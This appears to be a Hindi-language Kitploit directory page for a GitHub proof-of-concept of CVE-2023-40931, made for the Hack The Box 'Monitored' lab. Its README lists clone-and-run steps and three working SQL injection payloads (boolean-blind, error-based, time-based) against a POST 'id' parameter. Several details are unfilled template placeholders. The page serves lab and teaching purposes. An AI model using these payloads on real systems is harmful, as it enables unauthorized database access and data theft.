Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-40931-POC — CVE-2023-40931 Proof of Concept HTB MONITORED के लिए बनाया गया | Kitploit
उपकरण/GitHubGitHub/g4sp4rcs/cve-2023-40931-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubg4sp4rcs/cve-2023-40931-poc

CVE-2023-40931-POC

CVE-2023-40931 Proof of Concept HTB MONITORED के लिए बनाया गया

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-40931 प्रूफ ऑफ कॉन्सेप्ट (PoC) 🚨

यह रिपॉजिटरी CVE-2023-40931 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC) है, जो [प्रभावित सॉफ्टवेयर/सिस्टम] में पहचानी गई एक सुरक्षा भेद्यता है। इस रिपॉजिटरी का उद्देश्य केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए भेद्यता का प्रदर्शन करना है। 🛠️

अस्वीकरण ⚠️

यह परियोजना केवल शैक्षिक उद्देश्यों और अधिकृत परीक्षण के लिए है। इस कोड के दुरुपयोग से कानूनी परिणाम हो सकते हैं। लेखक इस कोड के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं। किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें। 🔒

विवरण 📋

  • CVE ID: CVE-2023-40931
  • भेद्यता प्रकार: [भेद्यता का प्रकार, जैसे, रिमोट कोड निष्पादन, विशेषाधिकार वृद्धि]
  • प्रभावित सॉफ्टवेयर: [प्रभावित सॉफ्टवेयर का नाम और संस्करण]
  • गंभीरता: [गंभीरता स्तर, जैसे, क्रिटिकल, उच्च] 🚩

अधिक जानकारी के लिए, आधिकारिक CVE प्रविष्टि देखें: CVE-2023-40931. 🔗

उपयोग 🚀

  1. रिपॉजिटरी क्लोन करें:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2023-40931-POC.git
    cd CVE-2023-40931-POC
    python3 exploit.py
    

    POST पैरामीटर 'id' असुरक्षित है। निम्नलिखित पेलोड ने भेद्यता का सफलतापूर्वक शोषण किया:

    • बूलियन-आधारित ब्लाइंड: यह पेलोड एक क्वेरी के सत्य मान को निर्धारित करने के लिए एक सशर्त कथन का उपयोग करता है, जिससे बूलियन तर्क के माध्यम से डेटा निष्कर्षण की अनुमति मिलती है।

      • Payload: action=acknowledge_banner_message&id=(SELECT (CASE WHEN (2064=2064) THEN 3 ELSE (SELECT 4367 UNION SELECT 3803) END))
    • त्रुटि-आधारित: यह पेलोड विशिष्ट त्रुटियों को ट्रिगर करके जानकारी निकालने के लिए डेटाबेस त्रुटि संदेशों का शोषण करता है।

      • Payload: action=acknowledge_banner_message&id=3 OR (SELECT 9867 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(9867=9867,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    • समय-आधारित ब्लाइंड: यह पेलोड सर्वर की प्रतिक्रिया समय का अवलोकन करके जानकारी का अनुमान लगाने के लिए समय विलंब का उपयोग करता है।

      • Payload: action=acknowledge_banner_message&id=3 AND (SELECT 9475 FROM (SELECT(SLEEP(5)))Robc)

    ये पेलोड SQL इंजेक्शन हमलों के प्रति भेद्यता की संवेदनशीलता को प्रदर्शित करते हैं। सावधानी से आगे बढ़ें और परीक्षण से पहले उचित प्राधिकरण सुनिश्चित करें। 🔒

  2. PoC को निष्पादित करने के लिए exploit.py फ़ाइल में दिए गए निर्देशों का पालन करें। 🧑‍💻

    नोट: सुनिश्चित करें कि आपके पास आवश्यक निर्भरताएँ स्थापित हैं। ✅

टूल डाउनलोड करें